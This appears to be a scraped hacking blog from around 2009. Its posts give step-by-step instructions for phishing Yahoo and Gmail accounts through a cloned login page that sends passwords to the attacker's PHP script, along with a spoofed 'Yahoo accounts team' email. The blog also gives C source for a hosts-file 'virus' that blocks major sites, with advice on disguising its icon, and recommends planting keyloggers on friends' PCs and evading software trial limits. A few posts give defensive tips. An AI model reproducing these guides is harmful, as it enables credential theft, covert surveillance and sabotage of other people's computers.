This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Hacking a MySpace Account


MySpace is one of the most widely used Social Networking website by many teenagers and adults across the globe.If you’re curious about hacking a MySpace Account or preventing your MySpace account from being hacked, then this post is for you.


Here are some of the ways of hacking a MySpace account.


Phishing


Phishing is the most commonly used method to hack MySpace or any other email accounts.The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages.These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc.But once the user attempts to login through these pages, his/her login details are stolen away.


Phishing is proved to be the most effective way of hacking passwords and also has high success rate.The reason for this is quite simple.The users are not aware of the phishing attack.Also the users are fooled, since the fake login pages imitate the appearance of the original pages.So, you may use the phishing technique to hack your friend’s MySpace account (just for fun).


A detailed tutorial on phishing is discussed in the following two posts.


Hack Yahoo, Gmail or any other Password.
How to Create a Fake Login Page?

Spywares


The term spyware suggests software that secretly monitors the user’s behavior. Spyware programs can collect various types of personal information, such as Internet surfing habits, sites that have been visited, passwords and other sensitive information.


Keyloggers are the most widely used program, which are nothing but spywares.If you want to hack your friend’s Myspace password, then all you have to do is just install a keylogger on your friend’s PC.Hacking a MySpace account using a keylogger is very easy, but also has some limitations.


For more information on keyloggers and their usage, refer the following post


Hacking an Email Account


Hacking Services


In most cases, hacking services are scams. Always ask for proof first before paying anything.I have tried many such hacking services(just to test them), but none of them have responded back.So personally I do not trust such services.


Please pass your comments and opinions….

How to Completely Erase a Hard Disk Drive

A new year has begun and perhaps you have decided to perform a system upgrade or get rid of your old computer system and purchase a new one.But before you sell or donate your old computer, it is very much necessary to completely erase your Hard Disk Drive.Yes, every one of us are aware of this fact and so, we delete the contents of the hard disk either by using the DELETE key on our keyboard or by Formatting the hard disk.


Deleting and Formatting - Just Not Secure Enough


But the fact is, the data will still be on the hard disk even after deleting it or formatting the hard disk. Using the delete key on your keyboard will only remove the shortcuts to the files making them invisible to users. Deleted files still reside on the hard drive and a quick Google search will show many options for system recovery software will allow anyone to reinstate that data.


Formatting the hard drive is a bit more secure way to erase the hard disk. Formatting a disk will not erase the data on the disk, only the address tables. It makes it much more difficult to recover the files. However a computer specialist would be able to recover most or all the data that was on the disk before the reformat. For those who accidentally reformat a hard disk, being able to recover most or all the data that was on the disk is a good thing. However, if you’re preparing a system for retirement to charity or any other organization, this obviously makes you more vulnerable to data theft.


Erasing the Hard Disk through DISK WIPING


So it is necessary for us to use a 100% secure way to erase the hard disk.The secure way of erasing the hard disk is called Disk Wiping.Disk wiping is a secure method of ensuring that data, including company and individually licensed software on your computer and storage devices is irrecoverably deleted before recycling or donating the equipment. Because previously stored data can be brought back with the right software and applications, the disk wiping process will actually overwrite your entire hard drive with data, several times. Once you format you’ll find it all but impossible to retrieve the data which was on the drive before the overwrite. The more times the disk is overwritten and formatted the more secure the disk wipe is.


There are a variety of disk wiping products available that you can purchase, or freely downloaded online to perform more secure disk wipes.One of my favorite disk wiping software is


WipeDrive/ WipeDrive Professional


You have to use this tool by burning the iso image file onto a CD or by using a floppy disk.After burning this tool you have to boot your PC and follow the screen instructions to completely erase the hard disk.

Hack Software and Run the Trial Program Forever

In this post I’ll show you how to hack a Software and run the trial program forever.Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period.Isn’t this interesting?


Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.


When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.


So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.


RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.


RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.


NOTE: FOLLOW THESE TIPS CAREFULLY


You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.


1. Note down the date and time, when you install the software for the first time.


2. Once the trial period expires, you must always run the software using RunAsDate.


3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.


4. It is better and safe to inject the date of the last day in the trial period.


For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate.


I hope this helps! Please express your experience and opinions through comments.

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number.Do you think I am crazy? No, I am not…….


Just try the following steps and you’ll get a call to your cell phone from your own number.


 


1. Just give a missed call to this number.You’ll not be charged!


+41445804650


2. Wait for a few seconds and you’ll get a call to your cell phone from your own number


3. Receive the call.You’ll hear a lady voice asking for a PIN number.Just enter some rubbish number.


4. She say’s- Your PIN cannot be processed and the call disconnects..


ANOTHER TRICK


Instead of giving a missed call, just continue calling.The call will not be received and will get disconnected just after a while.But now do you know what happen’s?


You will get a call from the number


+501


Reason behind this trick


God Knows!!


Just try and pass your comments. Tell me whether the second trick worked or not!!

How to Create a Fake Login Page?


In this post I’ll show you how to create a Fake Login Page in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.


Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.


 


Here is a step-by-step procedure to create a fake login page.


1. Go to the Yahoo login page by typing the following URL.


mail.yahoo.com


 2. Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)


3. Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .


4. Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files.You may also rename the .HTML file to yahoo.HTML


5. Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.


For example you may find something like this in the opened HTML file


src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif

Rename the above link into

 

src=”files/ma_mail_1.gif

Repeat the same procedure for every file contained in the Folder.

 

6. Now search for the following term

 

action=

 

you will see something like this

 

action=https://login.yahoo.com/config/login?


Edit this to

 

action=http://yoursite.com/login.php


Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

yoursite.com/


7. Now you have to upload your yahoo.HTML, files folder and login.php to

 


NOTE: Make sure that your host supports PHP


8. Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)


9. Once you do this distribute the Gmail.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file in your site.Download .TXT file to see the password inside


The details of hacking an email, using a Fake login page is discussed in detail in my new post  Hack Yahoo, Gmail or any other Password

Hack Yahoo, Gmail or any Email Password


Today I will show you how to Hack Yahoo, Gmail or any other email Password.I have already shown some of the easiest ways to Hack Yahoo in my previous post Hacking an email account.So, you may wonder what’s special about this post.Here in this post I will show all of you the real way to Hack Yahoo and other passwords.This method to hack passwords is same as the one used by many professional hackers.


NOTE:THIS TUTORIAL IS MEANT FOR EDUCATIONAL PURPOSE ONLY.I AM NOT RESPONSIBLE FOR ANY KIND OF MISUSE. 

 


STEPS TO BE CARRIED OUT BEFORE YOU HACK YAHOO 


Let’s see how to hack Yahoo in particular.Before we hack the password, we have to understand how to exploit the major vulnerabilities in Yahoo.During the sign up process, it allows your First name or the Last name to contain the Word Yahoo .Is this not a major flaw? Yes, because you can choose the first name as Yahoo Account and last name as Update.So, when you send an email from this Yahoo account, it appears to have come from


Yahoo Account Update (Yahoo Accounts Team)


So, this helps us to make the victims believe that this is an email from Yahoo Accounts Team.


So What’s Next?


CREATING A NEW ACCOUNT


Before you hack Yahoo, you need to create a new account as given below


1. Choose the first name as YAHOO ACCOUNT and last name as UPDATE.


2. Select an email ID something like this


update_account@yahoo.com


update08_account@yahoo.com


accountupdate09@yahoo.com  etc.


I think you got the idea.


3. Always select @yahoo.com not yahoo.co.uk or yahoo.co.in.


Now you are all set to hack the password.


USING A FAKE LOGIN PAGE TO HACK YAHOO


We have to hack yahoo using a fake login page.Hacking Yahoo using a Fake login page has more success rate than any other method.In fact, this is the real procedure adopted by many hackers to hack an email password.


The step-by-step procedure to create a fake login page is explained in my post How to create a fake login page


After you have setup your new Yahoo account and the fake login page, it’s just  a cakewalk to hack the password.All you have to do is just send an email from your fake Yahoo account to the victim’s ID saying that


————————————————————————————


Dear <Victim Name> or Yahoo subscriber,


It is highly recommended that you update your account immediately as per the new policy adopted by Yahoo.Blah blah…


Click Here to update your account.


Thanks,


The Yahoo accounts team


————————————————————————————


Remember to link your Fake login page to the text Click Here.Once the victim enters the password in the fake login page, you have successfully hacked the Yahoo password.The above procedure can also be used to hack Gmail and other email passwords.


You can see the DEMO of fake login page that I have created HERE.


Please pass your comments and opinions.

Denial Of Service Attack


Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.


What is a Denial Of Service Attack?

 




  • A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.

  • If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.


Types of denial of service attacks


There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:



  • bandwidth attacks,

  • protocol attacks, and

  • logic attacks



What is Distributed Denial of Service Attack?



  • An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.

  • This makes it difficult to detect because attacks originate from several IP addresses.

  • If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

Trojans and Backdoors

A Trojan horse is an unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.



  • It is a legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.

  • Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.


Working of Trojans




 



  • Attacker gets access to the trojaned system as the system goes online

  • By way of the access provided by the trojan attacker can stage attacks of different types.


Various Trojan Types



  • Remote Access Trojans

  • Password Sending Trojans

  • Keyloggers

  • Destructive

  • Denial Of Service (DoS) Attack Trojans

  • Proxy/Wingate Trojans

  • FTP Trojans

  • Software Detection Killers


Modes of Transmission



  • Attachments

  • Physical Access

  • Browser And E-mail Software Bugs

  • NetBIOS (File Sharing)

  • Fake Programs

  • Un-trusted Sites And Freeware Software


Backdoor Countermeasures



  • Most commercial ant-virus products can automatically scan and detect backdoor programs before they can cause damage (Eg. before accessing a floppy, running exe or downloading mail)

  • An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.

  • Educate your users not to install applications downloaded from the internet and e-mail attachments.

Keyloggers (Keystroke Loggers)

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.


There are two types of keystroke loggers:


1. Software based and

2. Hardware based.


Spy ware: Spector (http://www.spector.com/)



  • Spector is a spy ware and it will record everything anyone does on the internet.

  • Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.

  • Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer’s hard drive.


Hacking Tool: eBlaster (http://www.spector.com/)


  • eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

  • eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

  • Within seconds of them sending or receiving an email, you will receive your own copy of that email.

  • Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)


     


  • eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

  • eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

  • Within seconds of them sending or receiving an email, you will receive your own copy of that email.

  • Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)


    <


  • The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

  • It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.
  • Port Scanning

    Port Scanning is one of the most popular techniques used by hackers to discover services that can be compromised.



    • A potential target computer runs many ’services’ that listen at ‘well-known’ ‘ports’.

    • By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited.

    • Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.


    Port Scanning Techniques




    Port Scanning Techniques can be broadly classified into:



    • Open scan

    • Half- open scan

    • Stealth scan

    • Sweeps

    • Misc


    Commonly used tools for port scanning


    1.Tool: SuperScan 3.0



     


     


     


     


     


     


     


     


    2. Tool: NMap (Network Mapper)



    3. Tool: NetScan Tools Pro 2003



    4. Tool: ipEye, IPSecScan


    Proxy Servers and Anonymizers


    Proxy is a network computer that can serve as an intermediate for connection with other computers. They are usually used for the following purposes:

     




    • As firewall, a proxy protects the local network from outside access.

    • As IP-addresses multiplexer, a proxy allows to connect a number of computers to Internet when having only one IP-address.

    • Proxy servers can be used (to some extent) to anonymize web surfing.

    • Specialized proxy servers can filter out unwanted content, such as ads or ‘unsuitable’ material.

    • Proxy servers can afford some protection against hacking attacks.


    Anonymizers



    • Anonymizers are services that help make your own web surfing anonymous.

    • The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.

    • An anonymizer removes all the identifying information from a user’s computers while the user surfs the Internet, thereby ensuring the privacy of the user.

    Creating a Virus to Block Websites


    Most of us are familiar with the virus that used to block Orkut and Youtube site.If you are curious about creating such a virus on your own, then you are in the right place.Tody I’ll teach you how to create a simple virus that block’s websites.And as usual I’ll use my favorite programming language ‘C’ to create this website blocking virus.I will give a brief introduction about this virus before I jump into the technical jargon.


    This virus has been exclusively created in ‘C’.So, anyone with a basic knowledge of C will be able to understand the working of the virus.This virus need’s to be clicked only once by the victim.Once it is clicked, it’ll block a list of websites that has been specified in the source code.The victim will never be able to surf those websites unless he re-install’s the operating system.This blocking is not just confined to IE or Firefox.So once blocked, the site will not appear in any of the browser program.


    NOTE: You can also block a website manually.But, here I have created a virus that automates all the steps involved in blocking.The manual blocking process is described in the post How to Block a Website ?


    Here is the sourcecode of the virus.


    #include<stdio.h>

    #include<dos.h>

    #include<dir.h>


    char site_list[6][30]={

    “google.com”,

    “www.google.com”,

    “youtube.com”,

    “www.youtube.com”,

    “yahoo.com”,

    “www.yahoo.com”

    };

    char ip[12]=”127.0.0.1″;

    FILE *target;


    int find_root(void);

    void block_site(void);


    int find_root()

    {

    int done;

    struct ffblk ffblk;//File block structure


    done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

    /*to determine the root drive*/

    if(done==0)

    {

    target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

    /*to open the file*/

    return 1;

    }


    done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

    /*to determine the root drive*/

    if(done==0)

    {

    target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

    /*to open the file*/

    return 1;

    }


    done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

    /*to determine the root drive*/

    if(done==0)

    {

    target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

    /*to open the file*/

    return 1;

    }


    done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

    /*to determine the root drive*/

    if(done==0)

    {

    target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

    /*to open the file*/

    return 1;

    }


    else return 0;

    }


    void block_site()

    {

    int i;

    fseek(target,0,SEEK_END); /*to move to the end of the file*/


    fprintf(target,”\n”);

    for(i=0;i<6;i++)

    fprintf(target,”%s\t%s\n”,ip,site_list[i]);

    fclose(target);

    }


    void main()

    {

    int success=0;

    success=find_root();

    if(success)

    block_site();

    }


    How to Compile ?


    1. Download the source code here. Download the compiled module(virus) here.


    2. Compile the sourcecode using any C/C++ compiler.


    3. To test, run the compiled module. It will block the sites that is listed in the source code.


    4. Once you run the file block_Site.exe, restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.


    4. To remove the virus type the following the Run.

    %windir%\system32\drivers\etc


    5. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this


    127.0.0.1—————————google.com


    6. Delete all such entries which contain the names of blocked sites.


    NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post:How to Change the ICON of an EXE file ?

    Common Terminologies used in Internet Security


    If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security. So next time you don’t have to scratch your head when someone uses these.


    Firewall – is a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of information according to security policies.


    Hacker – can be anyone specializing in accessing computer based systems for illegal purposes or just for the fun of it.


    IP spoofing – is an attempt to access your system by pretending like another system. This is done by setting up a system with an IP address that you normally trust.


    Sniffing – is the spying on electronic transmissions to access data. This mostly occurs in privately owned LAN networks connected to the web.


    Trojan horse - a program pretending like useful software, while its actual strategy is to access, steal or destroy user data and access authorization. Apart from destroying information, trojans can also create a backdoor on your system for stealing confidential information.


    Virus – is a program that attaches itself to a program or file. This allows it to spread across networks and cause damage to software and hardware. To operate, viruses require the execution of the attached file.


    Worm - A worm is almost similar to a virus, except that it doesn’t need the execution of any executable file to get activated. It can also replicate itself as it travels across networks.

    Tips to improve Email Privacy


    Many websites ask for your email address when you shop online, download a free software etc. But do you know that this has a chance of affecting your email privacy through Spam emails?


    Though most websites don’t use spamming as an email marketing strategy, there are a few that use junk emails that don’t care about anti-Spam laws. Here are some tips to maintain your email privacy from such threats.

    Before submitting your email address you need to check the reputation of the company. Reputed websites would normally follow the right email practices to ensure your email privacy. Such companies will never want to loose their hard earned reputation by getting blammed for spamming.


    See whether the websites provides email privacy statements. You need to go through these statement in detail, and know about the kind of emails that will be sent to you, how often etc. Based on this you can decide on whether you need such emails. You don’t want to give your email address to some fraud company that is thinking about handing over your email address to hundreds of other websites.


    Finally, check whether the website really respects your privacy. Often you will find some text like “I agree to receive email” that comes with a check box. You can agree to receive emails by checking the check box. If the check box is already checked, it is just a good indication that the website doesn’t respect your privacy. So watch out!

    Common Email Hacking methods


    Gone are the days when email hacking was a sophisticated art. Today any body can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.


    Hackers can install key logger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details. Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).


    Another way of getting your password is the use of fake login pages that look exactly like the real one. So, beware of the webpages you visit. Also if you find your computer behaving oddly, there is a chance that some spy program is running. On such occasions it is better to try and remove the malware or reformat the entire hard disk.A detailed Email Hacking tutorial is discussed in the post Hacking an email account.


    Before leaving you should definitely consider reading my latest post Hacking Yahoo, Gmail or any other Password which covers the real ways of professional hacking.

    How to Download Videos from Youtube


    Here is the most easiest way to download videos from Youtube and convert it into other formats.Most of the sites give you some confusing way to download videos from Youtube, but here is an easy way.Here is step-by-step guide to download videos from Youtube.


    STEP-1. DOWNLOADING THE VIDEO FROM YOUTUBE


    Basically the video that you want to download from Youtube will be in the .flv format.So first, when you download videos from Youtube, it will be saved in .flv format. 


    Once you get the video URL,  you can use any one of the following sites/plugins to download Youtube videos .



    • Download Youtube Videos - Download Youtube Videos is one of the most widely site to download videos from Youtube in the .flv format.Here you’ll see a box to enter the download URL.Just enter the URL here and click on download to save the video.

    • KissYouTube - KissYouTube offers an easiest way to download videos from Youtube.Just visit the site and you’ll find a box to enter the video URL.In this box enter the URL of the video you want to download and click on GO.Next you will see a Download Button.Click on the download button and save the Youtube video with the extension as .flv .

    •  Download Helper - Download Helper is an excellent firefox plugin to download videos from Youtube.

    • My Video Downloader - MyVideo Downloader will Download and convert videos from many sites, not just YouTube.


     


    STEP-2. CONVERTING THE YOUTUBE VIDEO FROM .FLV TO OTHER FORMATS


    Once you download the video ,you can use any of the freely available/commercial video conversion softwares.But here in this tutorial I prefer OJOsoft Total Video Converter to convert the downloaded Youtube video.The speciality of this video converter is that it supports almost all the formats.Once you convert the Youtube downloaded video to MPEG format you’ll be able to play it with Windows Media Player.

    Hack/Alter Windows Vista Base Score

    If you are a Windows Vista user then you are very likely to be familiar with the Base Score.This score is calculated based on the computer’s hardware and software configuration.This score act’s as a rating to your PC.If you have a too low base score then don’t worry.Hacking Windows Vista’s so called Base Score is very easy.It is possible to hack this score within no time.Here are the snapshots of my own system.Actually my system’s base score is 3.7.But I have brought it up to 9.5 with this small hack.Can you beleive this!!




    Here is a step-by-step instruction to hack Vista Base score


    1. Navigate to C:\Windows\Performance\WinSAT\DataStore


    2. You should see a .xml file with Assessment (Formal).WinSAT as filename


    3. Right-click it and select open with ‘Wordpad’ (Not notepad!)


    4. On line 12, you should see something like the following:

    <SystemScore>9.5</SystemScore>

    <MemoryScore>9.5</MemoryScore>

    <CpuScore>9.5</CpuScore>

    <CPUSubAggScore>9.5</CPUSubAggScore>

    <VideoEncodeScore>5.5</VideoEncodeScore>

    <GraphicsScore>9.5</GraphicsScore>

    <GamingScore>9.5</GamingScore>

    <DiskScore>9.5</DiskScore>


    5. You can enter any number in the place where I have written 9.5.But the number should be less than 10.


    6. Once you have entered the number of your choice save the file and close it.


    7. That’s it.You have successfully altered your Windows Vista base score.No restart is required.

    Free Tools for Spyware Removal


    There are lot of PC users who know only little about “Spyware”, “Malware”, “hijackers”, “Dialers” & many more. This article will help you avoid pop-ups, spammers and all those baddies.


    What is spy-ware?

    Spyware is computer software that is installed surreptitiously on a personal computer to intercept or take partial control over the user’s interaction with the computer, without the user’s informed consent.The term spyware suggests software that secretly monitors the user’s behavior.Spyware programs can collect various types of personal information, such as Internet surfing habit, sites that have been visited etc.


    How to check if a program has spyware?

    It is this little site that keeps a database of programs that are known to install spyware.


    Check Out: SpywareGuide



    How To Block Pop-Ups?

    If you would like to block pop-ups (IE Pop-ups) there are tons of different tools out there, but these are the two best, I think.


    Try: Google Toolbar - This tool is a Freeware.

    Try: AdMuncher - This tool is a Shareware.


    How To Remove Spywares?

    If you want to remove spwares then you may try the following tools/programs


    Try: Lavasoft Ad-Aware - This tool is a freeware.

    Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.


    Try: Spybot-S&D - This tool is a freeware.

    Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.


    Try: Spy Sweeper - This tool is a shareware.

    Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.The best scanner out there, and updated all the time.


    Try: BPS Spyware and Adware Remover - This tool is a shareware.

    Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you’d like to remove.


    How To Prevent Spyware?

    To prevent spyware attack you can try the following tools.


    Try: SpywareBlaster - This tool is a freeware.

    Info: SpywareBlaster doesn’t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.


    Try: XP-AntiSpy - This tool is a freeware.

    Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people.

    Hack Protect your Orkut Account


    Most of the people ask me “How to hack an Orkut account” which I have already discussed in my previous post Hacking Orkut .But here I am giving you a detailed information about how to protect your Orkut accounts.As we all know most of the Google services are still in BETA.So,websites like Orkut, powered by Google is not totally secure!Several people feel proud in hacking other user’s account. You do a foolish thing, and next day your account is hacked. This is very sad indeed, but hackers are adding names to their victims list till now.


    How can a hacker hack my Orkut account?

    The answer to this question is already discussed in my previous post Hacking Orkut.



    But this post is meant for providing some safety measures to prevent your Orkut account from being hacked.There is not much you have to take care of. Just follow the simple steps and never get your orkut account hacked in your life.


    1. Never try to login/access your Orkut account from sites other than Orkut.com.


    2. Never click on any links from the sources you don’t trust while accessing your Orkut account.(or while accessing any other Google services like Gmail,Blogger etc.)


    3. Delete any links on your scrapbook, no matter if a known or unknown person have sent it.


    4. Never disclose your orkut login details with anyone.


    5. Never ever use Javascripts on Orkut, no matter whatever it claims to do.Get satisfied with the services provided by default! Avoid using third party Scripts which might be malicious.


    6. Never get excited to see a site claiming to have 1000 cool orkut tricks for which you have to just log in to your orkut account. Don’t trust that site. That’s a phishing site.


    7. Never tick the box “REMEMBER ME” on the orkut homepage if you are surfing from a cafe or a public area.


    8. Always remember to hit Sign out button, when you are done.

    How to Protect an Email Account from being hacked ?


    Today in this post I’ll teach you how to protect your email account from being hacked.Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”.Now one question which arises in our mind is:”Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”.The single answer to these two questions is “Absolutely NOT!”.It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.


    If this is the case, then what is the reason for many people to loose their accounts?

    The answer is very simple.They don’t know how to protect themselves from being hacked! In fact most of the people who loose their email accounts are not the victims of hacking but the victims of Trapping.They loose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.


    Are you confused? If so continue reading and you’ll come to know…


    Now I’ll mention some of the most commonly used online scams which fool people and make them loose their passwords.I’ll also mention how to protect your email account from these scams.


    1. WEBSITE SPOOFING


    Website spoofing is the act of creating a website, with the intention of misleading the readers.The website will be created by a different person or organisation (Other than the original)especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.


    For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website.So most of the people believe that it is the original site and loose their passwords.The main intention of spoofed websites is to fool users and take away their passwords.For this,the spoofed sites offer fake login pages.These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc.Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.


    Solution:



    • Never try to login/access your email account from the sites other than the original site.

    • Always type the URL of the site in the address bar to get into the site.Never click on the hyperlink to enter the site.


    2. BY USING KEYLOGGERS


    The other commonly used method to steal password is by using a Keylogger.Keylogger is nothing but a spyware.The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account.If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program.If you just access your email account from a computer installed with keylogger, you definitely loose your password. This is because the keylogger records each and every keystroke that you type.


    Solution:


    Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly.This keeps your PC secure from a keylogger.Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers.You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

    3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES


    Do you access your email from cyber cafes? Then definitely you are under the risk of loosing your password.In fact many people loose their email account in cyber cafes.For the owner of the cyber cafe it’s just a cakewalk to steal your password.For this he just need’s to install a keylogger on his computers.So when you login to your email account from this PC, you give away your password to the cafe owner.Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.


    This doesn’t mean that you should never use cyber cafes for browsing the internet.I know,all the cyber cafe owners will not be so wicked but it is recommended not to use cafes for accessing confidential information.If it comes to the matter of security never trust anyone,not even your friend.I always use my own PC to login to my accounts to ensure safety.


    So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked.Please pass your comments…

    How to Change the ICON of an EXE file ?


    Some times it becomes necessary to change the ICON of an executable(.exe) file so that the exe file get’s a new appearence.Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user.But in reality when the file is carried to a different computer, then it shows it’s original ICON itself.This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself.Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.


    For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie:The tool changes the exe ICON permanantly.


    I’ll give you a step-by-step instruction on how to use this tool to change the icon.


    1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).


    2. Right-click on the exe file whose ICON is to be changed.


    3. Now you will see the option Change Icon…Click on that option.


    4. Now the Icon Changer program will open up.


    5. Icon changer will search for all the ICONS on your system so that you can select any one of those.


    6. Now select the ICON of your choice and click on SET.


    7. Now a popup window will appear and ask you to select from either of these two options.



    • Change embeded icon.

    • Adjust Windows to display custom icon.


    Select the first option (Change embeded icon).


